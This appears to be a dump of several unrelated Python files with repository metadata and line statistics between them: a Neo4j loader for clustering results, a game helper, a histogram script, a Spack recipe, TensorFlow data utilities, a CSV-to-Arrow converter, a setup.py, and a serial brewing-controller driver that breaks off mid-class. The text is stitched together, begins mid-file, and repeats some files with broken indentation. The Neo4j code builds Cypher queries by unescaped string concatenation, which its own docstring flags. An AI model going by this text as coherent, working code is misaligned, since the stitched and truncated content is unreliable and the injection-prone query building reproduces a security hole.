        driver.close()
if __name__ == "__main__":
main()
| 37.434978 | 98 | 0.583972 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 25 13:08:45 2019
@author: briere
"""
import logging
import argparse
import os
from neo4j import GraphDatabase
descr = ('This script instanciate a Neo4j graph database from the metadata '
'file and the various clustering results to integrate.')
parser = argparse.ArgumentParser(description=descr)
parser.add_argument("-id", "--neo_id", help="Neo4j ID used to connect to the database")
parser.add_argument("-pwd", "--neo_pwd", help="Neo4j password used to connect to the database")
parser.add_argument("-host", "--neo_localhost", help="Neo4j graph localhost")
parser.add_argument("-cls", "--clustering_folder", help="Path to directory containing clustering "
"results files and metadata file \n Please note that cluster files must be "
"names following the pattern : {SUBJECT}_{DATATYPE}_{METHOD}.clst \n"
"The metadata file must be names following the pattern : "
"{SUBJECT}_metadata.txt \n Please, read the docs to make sure your "
"files respect the mandatory format.")
parser.add_argument("-subj", "--subject", help="Analysis subject")
parser.add_argument("-out", "--log_out", help="Log file")
args = parser.parse_args()
neo_id = args.neo_id
neo_pwd = args.neo_pwd
neo_localhost = args.neo_localhost
results_path = args.clustering_folder
subject = args.subject
log_file = args.log_out
logging.basicConfig(filename=log_file, level=logging.INFO, format='%(message)s')
logging.info('Loading results from %s in %s \n' % (subject, results_path))
def make_graph(results_path, subject, driver):
'''
Parameters
----------
results_path : STRING
Path to folder containing raw clustering results.
subject : STRING
Subject of analysis (e.g: AML to run the analysis form AML cancer).
Returns
-------
Log file. Instanciates the graph database with data from metadata file
and clustering results files.
'''
files = os.listdir(os.path.join(results_path, subject))
metadata_file = [file for file in files if "metadata" in file][0]
logging.info('Initiating graph from %s metadata.', metadata_file)
create_object_nodes(os.path.join(results_path, subject, metadata_file), subject, driver)
clustering_files = [file[0:-5] for file in files if file[-5:len(file)] == ".clst"]
for file in clustering_files:
datatype = file.split('_')[1]
method = file.split('_')[2]
clust_file = str(file) + '.clst'
logging.info('Loading %s clustering results.',
os.path.join(results_path, subject, clust_file))
logging.info('- computed on datatype : %s', datatype)
logging.info('- computed with method : %s', method)
create_cluster_nodes(os.path.join(results_path, subject, clust_file),
subject, datatype, method, driver)
def create_object_nodes(metadata_file, subject, driver):
    '''
    Parameters
    ----------
    metadata_file : STRING
        Path to metadata file. Must be named as follow:
            {SUBJECT}_metadata.txt
    subject : STRING
        Subject of analysis (e.g: AML to run the analysis form AML cancer).
    driver : neo4j driver
        Open connection; a session is created and always closed here.
    Returns
    -------
    Instanciate graph with data from metadata file.
    metadata_file : rows = "obects" nodes ids
                  cols = metadata nodes ids (with header as node names)
    On first line, for each column, specify how it should be represented in the graph:
        - "main_nodes" for the objects to cluster (e.g Patients TCGA id)
        - as a node linked to main_nodes: "node"
        - as a label of main_nodes: "label"
        - as a property of main nodes : "prop"
    NOTE: Cypher is built by string concatenation; ids, labels and values
    from the metadata file are not escaped. Only feed trusted input files.
    '''
    print("Instanciating graph for " + subject + "from metadata file : " + metadata_file)
    print("Check the graph in your Neo4j browser by querying : \n" +
          "MATCH (o:" + subject + ") RETURN o LIMIT 100")
    graph = driver.session()
    try:
        with open(metadata_file) as file:
            # First header line: representation keyword of each metadata column.
            col_types = file.readline().strip().split('\t')
            for col_type in col_types[1:]:
                if col_type not in ('label', 'node', 'property'):
                    logging.error('Error : Wrong column type. Must be "label",'
                                  '"node" or "property". Please, modify the metadata file. \n')
            # Second header line: column names; first column is the main node type.
            col_names = file.readline().strip().split('\t')
            main_node = col_names[0]
            for raw_line in file:
                line = raw_line.strip()
                if not line:
                    # Robustness fix: a trailing blank line used to create
                    # a main node with an empty id.
                    continue
                data = line.split('\t')
                # Create object node
                node_id = data[0]
                node = "(o:" + subject + ":" + main_node + "{id:'" + node_id + "'})"
                graph.run("MERGE" + node)
                # Attach metadata as property / label / linked node
                for i in range(1, len(data)):
                    if col_types[i] == "property" and data[i] != '':
                        graph.run("MATCH" + node + "SET o." + col_names[i] + "='" + data[i] + "'")
                    elif col_types[i] == "label" and data[i] != '':
                        graph.run("MATCH" + node + "SET o:" + data[i])
                    elif col_types[i] == "node" and data[i] != '':
                        meta_node = "(m:" + col_names[i] + "{id:'" + data[i] + "'})"
                        graph.run("MERGE" + meta_node)
                        meta_rel = "[r:" + col_names[i] + "]"
                        graph.run("MATCH" + node + " MATCH" + meta_node +
                                  " CREATE (o)-" + meta_rel + "->(m)")
                    elif col_types[i] not in ["property", "label", "node"]:
                        logging.info('"%s" is not a valid keyword.', col_types[i])
                        logging.info('Please use "property", "label" or "node". Skipping.')
                        # Bug fix: the original ended this branch with the bare
                        # expression `next` (the builtin), which does nothing;
                        # explicitly skip the invalid column instead.
                        continue
    finally:
        # Bug fix: the session is now closed even if parsing or a query fails.
        graph.close()
def create_cluster_nodes(clust_file, subject, datatype, method, driver):
'''
Parameters
----------
clust_file : STRING
Path to a raw clustering result file. This file must be named as follow:
{SUBJECT}_{DATATYPE}_{METHOD}.clst
subject : STRING
Subject of analysis (e.g: AML to run the analysis form AML cancer).
datatype : STRING
Datatype used to compute this clustering.
method : STRING
Method used to compute this clustering.
Returns
-------
Compute edges between main_nodes and their respective cluster nodes.
'''
graph = driver.session()
with open(clust_file) as file:
line = file.readline()
line = line.strip()
col_names = line.split('\t')
main_node = col_names[0]
clust_node = col_names[1]
clust_labels = ":".join([clust_node, subject, datatype, method])
id_base = "_".join([subject, datatype, method])
print("Loading input clustering results for " + subject + "from file: " + clust_file)
print("Check the graph in your Neo4j browser by querying : \n" +
"MATCH (o:" + main_node + ":" + subject + ")-[r:PART_OF]-(c:"+\
clust_labels + ") RETURN * LIMIT 100")
line = file.readline()
while line:
node_id = line.split('\t')[0]
clust_nb = str(line.split('\t')[1].strip())
clust_id = id_base + "_" + str(clust_nb)
node = "(o:" + subject + ":" + main_node + "{id:'" + node_id + "'})"
clust = "(c:" + clust_labels + "{id:'" + clust_id + "'})"
graph.run("MERGE" + clust)
graph.run("MATCH" + clust + " MATCH" + node +\
" CREATE (o)-[:PART_OF]->(c)")
line = file.readline()
graph.close()
def main():
'''
Parameters
----------
neo_id : STRING
Neo4j database connection ID.
neo_pwd : STRING
Password to connect to Neo4j database.
neo_localhost : STRING
Database localhost adress (e.g: http://localhost:7474).
Returns
-------
Instanciate graph from metadata file and raw clustering files.
'''
driver = GraphDatabase.driver(uri=neo_localhost, auth=(neo_id, neo_pwd))
make_graph(results_path, subject, driver)
driver.close()
if __name__ == "__main__":
main()
| 0 | 0 | 0 |
27899259a957b4d8938490e555c47e2ab24e0936 | 820 | py | Python | botTools/proximityFinder.py | LHGames-2018/Look-Ma-No-HandsEsclamation | 10454605a7c8bef42e2ced9b10e40b2a3a688747 | [
"MIT"
] | null | null | null | botTools/proximityFinder.py | LHGames-2018/Look-Ma-No-HandsEsclamation | 10454605a7c8bef42e2ced9b10e40b2a3a688747 | [
"MIT"
] | null | null | null | botTools/proximityFinder.py | LHGames-2018/Look-Ma-No-HandsEsclamation | 10454605a7c8bef42e2ced9b10e40b2a3a688747 | [
"MIT"
] | null | null | null | import math
from helper import Point
| 25.625 | 72 | 0.608537 | import math
from helper import Point
class ProximityFinder:
    """Geometry helper for locating the map tile nearest to the player."""

    @staticmethod
    def findClosestTile(playerPosition, tiles):
        """
        Return the position of the tile closest to the player.

        :param playerPosition: the player's position (exposes .x / .y)
        :param tiles: iterable of same-type tiles (each exposes .x / .y)
        :return: Point of the closest tile, or {} when *tiles* is empty
                 (the empty dict is kept for backward compatibility)
        """
        closest_position = {}
        # Bug fix: the original used an arbitrary 20000 cap as the initial
        # minimum, silently ignoring any tile farther than that; +inf
        # removes the hidden limit without changing normal-case results.
        best_distance = float('inf')
        for tile in tiles:
            # math.hypot replaces the original's inconsistent mix of
            # math.pow/builtin pow + sqrt; same Euclidean distance.
            distance = math.hypot(tile.x - playerPosition.x,
                                  tile.y - playerPosition.y)
            if distance < best_distance:
                closest_position = Point(tile.x, tile.y)
                best_distance = distance
        return closest_position
| 0 | 759 | 23 |
634f5d7e03d3f278d68ac61c4a16b596c7887d60 | 534 | py | Python | Requirement 5/code/old versions of code/ii.py | Dhaval-B-Patel/DIGITAL-SECURITY-PROJECT | 0195f121c272c5db20865641620cf6c652894d97 | [
"Unlicense"
] | null | null | null | Requirement 5/code/old versions of code/ii.py | Dhaval-B-Patel/DIGITAL-SECURITY-PROJECT | 0195f121c272c5db20865641620cf6c652894d97 | [
"Unlicense"
] | null | null | null | Requirement 5/code/old versions of code/ii.py | Dhaval-B-Patel/DIGITAL-SECURITY-PROJECT | 0195f121c272c5db20865641620cf6c652894d97 | [
"Unlicense"
] | null | null | null | from skimage import io
import matplotlib.pyplot as plt
import sys
# Load the image whose path is given as the first command-line argument.
image = io.imread(sys.argv[1])
# Overall intensity histogram across every pixel value.
_ = plt.hist(image.ravel(), bins = 256, color = 'orange', )
# Per-channel histograms; assumes a 3-channel image with index
# 0/1/2 = red/green/blue — TODO confirm inputs are RGB.
_ = plt.hist(image[:, :, 0].ravel(), bins = 256, color = 'red', alpha = 0.5)
_ = plt.hist(image[:, :, 1].ravel(), bins = 256, color = 'Green', alpha = 0.5)
_ = plt.hist(image[:, :, 2].ravel(), bins = 256, color = 'Blue', alpha = 0.5)
_ = plt.xlabel('Intensity Value')
_ = plt.ylabel('Count')
_ = plt.legend(['Total', 'Red_Channel', 'Green_Channel', 'Blue_Channel'])
plt.show() | 41.076923 | 78 | 0.627341 | from skimage import io
import matplotlib.pyplot as plt
import sys
# Load the image given as the first command-line argument.
image = io.imread(sys.argv[1])
# Overall intensity histogram across all channels combined.
_ = plt.hist(image.ravel(), bins = 256, color = 'orange', )
# Per-channel histograms (R=0, G=1, B=2), semi-transparent so they overlay.
# Assumes a 3-channel image — TODO confirm grayscale inputs are excluded.
_ = plt.hist(image[:, :, 0].ravel(), bins = 256, color = 'red', alpha = 0.5)
_ = plt.hist(image[:, :, 1].ravel(), bins = 256, color = 'Green', alpha = 0.5)
_ = plt.hist(image[:, :, 2].ravel(), bins = 256, color = 'Blue', alpha = 0.5)
_ = plt.xlabel('Intensity Value')
_ = plt.ylabel('Count')
_ = plt.legend(['Total', 'Red_Channel', 'Green_Channel', 'Blue_Channel'])
plt.show() | 0 | 0 | 0 |
16c1ba6463e66a8c7b907f0b22be21daf693caf1 | 851 | py | Python | var/spack/repos/builtin/packages/r-jpeg/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11 | 2015-10-04T02:17:46.000Z | 2018-02-07T18:23:00.000Z | var/spack/repos/builtin/packages/r-jpeg/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 22 | 2017-08-01T22:45:10.000Z | 2022-03-10T07:46:31.000Z | var/spack/repos/builtin/packages/r-jpeg/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4 | 2016-06-10T17:57:39.000Z | 2018-09-11T04:59:38.000Z | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RJpeg(RPackage):
    """Read and write JPEG images.
    This package provides an easy and simple way to read, write and display
    bitmap images stored in the JPEG format. It can read and write both files
    and in-memory raw vectors."""
    # CRAN package name; Spack derives the download URLs for the versions
    # below from it.
    cran = "jpeg"
    version('0.1-9', sha256='01a175442ec209b838a56a66a3908193aca6f040d537da7838d9368e46913072')
    version('0.1-8.1', sha256='1db0a4976fd9b2ae27a37d3e856cca35bc2909323c7a40724846a5d3c18915a9')
    version('0.1-8', sha256='d032befeb3a414cefdbf70ba29a6c01541c54387cc0a1a98a4022d86cbe60a16')
    # Needs R >= 2.9.0 at build and run time, plus the system libjpeg.
    depends_on('r@2.9.0:', type=('build', 'run'))
    depends_on('jpeg')
| 35.458333 | 97 | 0.747356 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RJpeg(RPackage):
    """Read and write JPEG images.
    This package provides an easy and simple way to read, write and display
    bitmap images stored in the JPEG format. It can read and write both files
    and in-memory raw vectors."""
    # CRAN package name; Spack derives the download URLs for the versions
    # below from it.
    cran = "jpeg"
    version('0.1-9', sha256='01a175442ec209b838a56a66a3908193aca6f040d537da7838d9368e46913072')
    version('0.1-8.1', sha256='1db0a4976fd9b2ae27a37d3e856cca35bc2909323c7a40724846a5d3c18915a9')
    version('0.1-8', sha256='d032befeb3a414cefdbf70ba29a6c01541c54387cc0a1a98a4022d86cbe60a16')
    # Needs R >= 2.9.0 at build and run time, plus the system libjpeg.
    depends_on('r@2.9.0:', type=('build', 'run'))
    depends_on('jpeg')
| 0 | 0 | 0 |
1d74c94de683832fa6b065ee16fc011fa1418d9a | 4,072 | py | Python | data_utils.py | KnightZhang625/EANN_TensorFlow | 140bab46148924374fdc0b434dd58ee12f678642 | [
"Apache-2.0"
] | 1 | 2021-11-03T10:59:15.000Z | 2021-11-03T10:59:15.000Z | data_utils.py | KnightZhang625/EANN_TensorFlow | 140bab46148924374fdc0b434dd58ee12f678642 | [
"Apache-2.0"
] | null | null | null | data_utils.py | KnightZhang625/EANN_TensorFlow | 140bab46148924374fdc0b434dd58ee12f678642 | [
"Apache-2.0"
] | null | null | null | # coding:utf-8
# Produced by Jiaxin Zhang
# Start Data: 20_May_2020
# Data processing module.
#
# For GOD I Trust.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import copy
import random
import codecs
import pickle
import functools
import tensorflow as tf
tf.enable_eager_execution()
import config
load_dict()
# function for converting string to idx
convert_vocab_idx = lambda string : [vocab_idx[v] if v in vocab_idx else vocab_idx['<unk>'] \
for v in string.split(' ')]
# padding
padding_func = lambda data, max_length : data + [vocab_idx['<padding>'] \
for _ in range(max_length - len(data))]
padding_func_with_args = functools.partial(padding_func, max_length=config.eann_config.max_length)
@input_fn
@input_fn
if __name__ == '__main__':
for datas in train_input_fn(config.TRAIN_DATA_PATH, 10):
print(datas[1]['label'])
print(datas[1]['event'])
input() | 32.83871 | 98 | 0.668959 | # coding:utf-8
# Produced by Jiaxin Zhang
# Start Data: 20_May_2020
# Data processing module.
#
# For GOD I Trust.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import copy
import random
import codecs
import pickle
import functools
import tensorflow as tf
tf.enable_eager_execution()
import config
def load_dict():
    """Populate the module-level ``vocab_idx`` mapping from the pickled vocab file."""
    global vocab_idx
    with codecs.open(config.VOCAB_PATH, 'rb') as vocab_file:
        raw_bytes = vocab_file.read()
    vocab_idx = pickle.loads(raw_bytes)
load_dict()
def create_batch_idx(data_length, batch_size):
    """Yield ``(start, end)`` index pairs covering ``data_length`` items in
    ``batch_size`` chunks.

    The final pair's ``end`` may exceed ``data_length``; callers use the pairs
    for slicing, where the overshoot is harmless. ``range`` with a step
    replaces the original manual ceil-division bookkeeping.
    """
    for start in range(0, data_length, batch_size):
        yield (start, start + batch_size)
# Map a space-tokenized string to vocabulary indices; out-of-vocabulary
# tokens fall back to the '<unk>' index.
convert_vocab_idx = lambda string : [vocab_idx[v] if v in vocab_idx else vocab_idx['<unk>'] \
                                     for v in string.split(' ')]
# Right-pad an index list with the '<padding>' index up to max_length
# (a no-op when the list is already max_length or longer).
padding_func = lambda data, max_length : data + [vocab_idx['<padding>'] \
                                     for _ in range(max_length - len(data))]
# padding_func specialized to the configured maximum sequence length.
padding_func_with_args = functools.partial(padding_func, max_length=config.eann_config.max_length)
def data_generator(data_path):
    """Yield ``(features, tags)`` batch dicts from a pickled sample list.

    Each pickled sample is assumed to be a 4-tuple
    (text, image, label, event) — TODO confirm against the pickling side.
    Text is converted to padded vocabulary indices; images/labels/events are
    passed through unchanged. Batch size comes from ``config.BATCH_SIZE``.
    """
    # load the data
    with codecs.open(data_path, 'rb') as file:
        datas = pickle.load(file)
    # Deep-copy before shuffling so repeated generator runs do not mutate any
    # shared structure, then shuffle for this epoch.
    datas = copy.deepcopy(datas)
    random.shuffle(datas)
    # generate batch data
    batch_size = config.BATCH_SIZE
    for (start, end) in create_batch_idx(len(datas), batch_size):
        data_batch = datas[start : end]
        text = [data[0] for data in data_batch]
        image = [data[1] for data in data_batch]
        label = [data[2] for data in data_batch]
        event = [data[3] for data in data_batch]
        # convert strings to vocabulary ids and pad to the configured length
        text_idx = list(map(convert_vocab_idx, text))
        text_idx_padded = list(map(padding_func_with_args, text_idx))
        features = {'input_text': text_idx_padded,
                    'input_image': image}
        tags = {'label': label,
                'event': event}
        yield(features, tags)
def input_fn(func):
    """Decorator turning a stub into a tf.data input function.

    NOTE(review): ``func`` itself is never called — ``functools.wraps`` only
    copies its name/docstring onto the replacement. The decorated callable's
    real signature is ``(data_path, steps)`` and it returns a repeated
    ``tf.data.Dataset`` built from :func:`data_generator`.
    """
    @functools.wraps(func)
    def input_fn(data_path, steps):
        # Types/shapes must mirror the (features, tags) dicts that
        # data_generator yields: ragged [batch, seq] token ids, images with a
        # trailing channel dim of 3, and per-sample label/event ids.
        output_types = {'input_text': tf.int32,
                        'input_image': tf.float32}
        output_shapes = {'input_text': [None, None],
                         'input_image': [None, None, None, 3]}
        tag_types = {'label': tf.int32,
                     'event': tf.int32}
        tag_shapes = {'label': [None],
                      'event': [None]}
        data_generator_with_path = functools.partial(data_generator, data_path=data_path)
        dataset = tf.data.Dataset.from_generator(
            data_generator_with_path,
            output_types=(output_types, tag_types),
            output_shapes=(output_shapes, tag_shapes))
        # Repeat for the requested number of passes over the data.
        dataset = dataset.repeat(steps)
        return dataset
    return input_fn
# The decorator replaces this stub entirely: the exported train_input_fn has
# signature (data_path, steps) and returns a tf.data.Dataset.
@input_fn
def train_input_fn():
    pass
# Same as train_input_fn: the decorator supplies the whole implementation,
# giving eval_input_fn the signature (data_path, steps) -> tf.data.Dataset.
@input_fn
def eval_input_fn():
    pass
def server_input_fn():
    """Build the serving-input receiver for tf.estimator model export.

    The placeholders mirror the feature dict produced by data_generator; the
    same tensors serve both as the receiver's raw inputs and as the model's
    features (no preprocessing at serving time).
    """
    input_text = tf.placeholder(tf.int32, shape=[None, None], name='input_text')
    input_image = tf.placeholder(tf.float32, shape=[None, None, None, 3], name='input_image')
    receive_tensor = {'input_text': input_text,
                      'input_image': input_image}
    features = {'input_text': input_text,
                'input_image': input_image}
    return tf.estimator.export.ServingInputReceiver(features, receive_tensor)
if __name__ == '__main__':
for datas in train_input_fn(config.TRAIN_DATA_PATH, 10):
print(datas[1]['label'])
print(datas[1]['event'])
input() | 2,371 | 0 | 159 |
4fb586103fe0edef0a4a7e8014f40d0dfc525a60 | 879 | py | Python | example/org2/csv2feather.py | public-tatsuya-noyori/meteorological_visualizer | 0566c74a1a0465f7a78ea57788a6f52357672d2c | [
"Apache-2.0"
] | 1 | 2021-01-05T09:44:30.000Z | 2021-01-05T09:44:30.000Z | example/org2/csv2feather.py | public-tatsuya-noyori/meteorological_visualizer | 0566c74a1a0465f7a78ea57788a6f52357672d2c | [
"Apache-2.0"
] | 11 | 2020-08-05T05:51:32.000Z | 2022-01-12T23:48:27.000Z | example/org2/csv2feather.py | public-tatsuya-noyori/meteorological_visualizer | 0566c74a1a0465f7a78ea57788a6f52357672d2c | [
"Apache-2.0"
] | 3 | 2020-08-04T23:26:49.000Z | 2020-08-14T07:01:06.000Z | #!/usr/bin/env python3
import os
import re
import sys
import pandas as pd
import pyarrow as pa
from pyarrow import csv, feather
# Convert the CSV named on the command line into an uncompressed Arrow file,
# gzip the result, and print the final file name.
in_file = sys.argv[1]
in_df = csv.read_csv(in_file).to_pandas()
if 'datetime' in in_df.columns.values.tolist():
    in_df['datetime'] = pd.to_datetime(in_df.datetime, utc=True)
# NOTE(review): in_df (with the normalized datetime column) is NOT what gets
# written below — the CSV is re-read from disk for the output table,
# presumably a leftover from an earlier feather-writing variant. Confirm
# before relying on the datetime normalization.
out_file = re.sub(r'\.csv$', '.arrow', os.path.basename(in_file))
frame = csv.read_csv(in_file).to_pandas()
for int_column in ('viewerIndex', 'size', 'gridSize'):
    frame = frame.astype({int_column: 'int32'})
with open(out_file, 'bw') as out_f:
    feather.write_feather(pa.Table.from_pandas(frame), out_f, compression='uncompressed')
os.system("gzip {}".format(out_file))
print(out_file + '.gz')
| 43.95 | 206 | 0.724687 | #!/usr/bin/env python3
import os
import re
import sys
import pandas as pd
import pyarrow as pa
from pyarrow import csv, feather
# Convert the CSV named on the command line to an Arrow file, then gzip it.
in_file = sys.argv[1]
in_df = csv.read_csv(in_file).to_pandas()
# Normalize any 'datetime' column to timezone-aware UTC timestamps.
# NOTE(review): this normalized frame is not what gets written below — the
# CSV is re-read from disk for the output; confirm the normalization is
# actually intended to be dropped.
if 'datetime' in in_df.columns.values.tolist():
  in_df['datetime'] = pd.to_datetime(in_df.datetime, utc=True)
#out_file = re.sub(r'\.csv$', '.feather', os.path.basename(in_file))
out_file = re.sub(r'\.csv$', '.arrow', os.path.basename(in_file))
with open(out_file, 'bw') as out_f:
  #feather.write_feather(pa.Table.from_pandas(csv.read_csv(in_file).to_pandas()), out_f, compression='zstd', compression_level=15)
  # Re-reads the CSV and force-casts three id/size columns to int32 before
  # writing an uncompressed Arrow table.
  feather.write_feather(pa.Table.from_pandas(csv.read_csv(in_file).to_pandas().astype({'viewerIndex': 'int32'}).astype({'size': 'int32'}).astype({'gridSize': 'int32'})), out_f, compression='uncompressed')
# NOTE(review): shelling out with an unquoted filename; gzip replaces
# out_file with out_file + '.gz'.
os.system("gzip {}".format(out_file))
print(out_file + '.gz')
| 0 | 0 | 0 |
95c237b16aac2282ed9e9b22d2258e0297ce9922 | 554 | py | Python | setup.py | Tatersic/Vnode | 8ec7009517f6ac9441ac9352e6dbc08e16cc3402 | [
"MIT"
] | null | null | null | setup.py | Tatersic/Vnode | 8ec7009517f6ac9441ac9352e6dbc08e16cc3402 | [
"MIT"
] | null | null | null | setup.py | Tatersic/Vnode | 8ec7009517f6ac9441ac9352e6dbc08e16cc3402 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
name="Vnode",
version="0.1.0",
description="A fast wheel to build a node network.",
author="Tatersic&Ovizro",
author_email="Tatersic@qq.com",
maintainer="Ovizro",
maintainer_email="Ovizro@hypercol.com",
license="MIT",
url="https://github.com/Tatersic/Vnode",
download_url="https://github.com/Tatersic/Vnode/archive/refs/heads/master.zip",
packages=["vnode"],
requires=["aiohttp"],
python_requires=">=3.8",
exclude_package_data={
'':['test.*']
}
) | 24.086957 | 83 | 0.642599 | from setuptools import setup
# Package metadata for the Vnode distribution.
setup(
    name="Vnode",
    version="0.1.0",
    description="A fast wheel to build a node network.",
    author="Tatersic&Ovizro",
    author_email="Tatersic@qq.com",
    maintainer="Ovizro",
    maintainer_email="Ovizro@hypercol.com",
    license="MIT",
    url="https://github.com/Tatersic/Vnode",
    download_url="https://github.com/Tatersic/Vnode/archive/refs/heads/master.zip",
    packages=["vnode"],
    # ``install_requires`` (not the obsolete ``requires`` metadata keyword,
    # which pip ignores) is what actually installs the aiohttp dependency.
    install_requires=["aiohttp"],
    python_requires=">=3.8",
    exclude_package_data={
        '':['test.*']
    }
)
96cfc389cb065e1c9dd412436628111f89e39294 | 4,563 | py | Python | brewmeister/controller/brewslave.py | brewpeople/brewmeister | 82a5402a3cd528892b13d2a8b7a58d6c15e4ae9f | [
"MIT"
] | 2 | 2018-12-30T17:55:54.000Z | 2022-03-03T20:24:57.000Z | brewmeister/controller/brewslave.py | brewpeople/brewmeister | 82a5402a3cd528892b13d2a8b7a58d6c15e4ae9f | [
"MIT"
] | null | null | null | brewmeister/controller/brewslave.py | brewpeople/brewmeister | 82a5402a3cd528892b13d2a8b7a58d6c15e4ae9f | [
"MIT"
] | null | null | null | import os
import re
import time
import struct
import serial
import threading
import crcmod
COMMAND_GET = struct.pack('B', 0xf0)
COMMAND_SET = struct.pack('B', 0xf1)
DS18B20 = struct.pack('B', 0xf1)
HEATER = struct.pack('B', 0xf2)
STIRRER = struct.pack('B', 0xf3)
# Contrary to crcmod's definition, brewslave expects a bit-reversed CRC
crc8 = crcmod.mkCrcFun(0x131, 0, False, 0)
| 28.879747 | 91 | 0.586895 | import os
import re
import time
import struct
import serial
import threading
import crcmod
# Protocol command bytes — the first byte of every frame sent to the slave.
COMMAND_GET = struct.pack('B', 0xf0)
COMMAND_SET = struct.pack('B', 0xf1)
# Device/address bytes — the second byte of every frame. Note DS18B20 happens
# to share the 0xf1 value with COMMAND_SET; they occupy different frame slots.
DS18B20 = struct.pack('B', 0xf1)
HEATER = struct.pack('B', 0xf2)
STIRRER = struct.pack('B', 0xf3)
# Contrary to crcmod's definition, brewslave expects a bit-reversed CRC
crc8 = crcmod.mkCrcFun(0x131, 0, False, 0)
class Brewslave(object):
    """Serial-port driver for the brewslave controller.

    Speaks a small framed protocol: [command byte][device byte][4 payload
    bytes] followed by a CRC-8 byte, with 7-byte checked replies. All serial
    traffic is serialized through a lock so property access is thread-safe.

    NOTE(review): several methods test ``self.connected``, which is never
    defined in this class — presumably provided by a subclass or patched in;
    confirm, otherwise those paths raise AttributeError.
    NOTE(review): ``data[6]`` / ``struct.unpack('B', data[6])`` implies
    Python 2 string semantics for the serial read; under Python 3 indexing
    bytes yields an int and unpack would raise — confirm target interpreter.
    """
    def __init__(self, app):
        """Open the first /dev tty that looks like a USB serial device.

        :param app: application object; only ``app.logger`` is used here.
        """
        device = None
        for x in os.listdir('/dev'):
            if re.match(r"tty(ACM.|USB.|\.usbserial.*|\.usbmodem.*)", x):
                device = os.path.join('/dev', x)
                break
        self.app = app
        # device stays None when nothing matched; serial.Serial(None) then
        # creates an unopened port object.
        self.conn = serial.Serial(device, timeout=2, baudrate=115200)
        self._lock = threading.Lock()
        # Cached last-known actuator states, refreshed by the properties below.
        self._heating = False
        self._stirring = False
        # May be None when the initial temperature read fails (see
        # _read_temperature, which swallows errors and returns nothing).
        self._target = self._read_temperature()
    def _send_packet(self, command, device, payload_fmt=None, *payload):
        """Write one framed packet (header, payload, CRC-8) to the port."""
        if not payload:
            # No payload: pad with four zero bytes to keep the frame size fixed.
            packet = struct.pack('ssBBBB', command, device, 0, 0, 0, 0)
        else:
            packet = struct.pack('ss{}'.format(payload_fmt), command, device, *payload)
        checksum = struct.pack('B', crc8(packet))
        self.conn.write(packet)
        self.conn.write(checksum)
    def _write_checked(self, device, payload_fmt, *payload):
        """Send a SET command under the lock and consume the ack byte."""
        if self.connected:
            try:
                self._lock.acquire()
                self._send_packet(COMMAND_SET, device, payload_fmt, *payload)
                # Read ack byte
                self.conn.read(1)
            finally:
                self._lock.release()
        else:
            raise IOError("Not connected")
    def _read_checked(self, device, num_bytes=7):
        """Send a GET command and return the CRC-validated raw reply.

        Raises IOError on timeout, short reads, or checksum mismatch.
        """
        if not self.connected:
            raise IOError("Not connected")
        try:
            self._lock.acquire()
            self._send_packet(COMMAND_GET, device)
            data = self.conn.read(num_bytes)
            if not data:
                raise IOError("Received no data")
            if len(data) != num_bytes:
                raise IOError("Received {} != {} bytes".format(len(data), num_bytes))
            # Last byte is the CRC of the first six.
            checksum = struct.unpack('B', data[6])[0]
            expected = crc8(data[:6])
            if checksum != expected:
                raise IOError("Checksum {} does not match {}".format(checksum, expected))
            return data
        finally:
            self._lock.release()
    def _read_boolean(self, device):
        """Read a device and interpret the second reply byte as a boolean."""
        data = self._read_checked(device)
        received_device, result = struct.unpack('BB', data[0:2])
        return result != 0
    def _read_float(self, device):
        """Read a device and unpack bytes 2..5 of the reply as a float."""
        data = self._read_checked(device)
        received_device, status = struct.unpack('BB', data[0:2])
        result = struct.unpack('f', data[2:6])[0]
        return result
    def _write_boolean(self, device, value):
        # '?BBB' = one bool plus three zero padding bytes (fixed frame size).
        self._write_checked(device, '?BBB', value, 0, 0, 0)
    def _write_float(self, device, value):
        self._write_checked(device, 'f', value)
    def _read_temperature(self):
        """Read the DS18B20 temperature; log and return None on failure."""
        try:
            return self._read_float(DS18B20)
        except serial.SerialException as exception:
            self.app.logger.warning("Serial connection problem: {}".format(str(exception)))
        except IOError as exception:
            self.app.logger.warning("temperature: {}".format(str(exception)))
    @property
    def temperature(self):
        # Current sensor reading (None when the read fails).
        return self._read_temperature()
    @property
    def target(self):
        # Last target temperature this driver set (cached locally).
        return self._target
    @target.setter
    def target(self, temperature):
        self._target = temperature
        is_set = False
        # Retry until the slave acknowledges the new setpoint.
        while not is_set:
            try:
                self._write_float(DS18B20, temperature)
                is_set = True
            except IOError:
                # TODO: this is unbounded!
                time.sleep(0.5)
    @property
    def heating(self):
        # Refresh the cached heater state; on IOError fall back to the cache.
        try:
            self._heating = self._read_boolean(HEATER)
        except IOError as exception:
            self.app.logger.warning("heating: {}".format(str(exception)))
        return self._heating
    @heating.setter
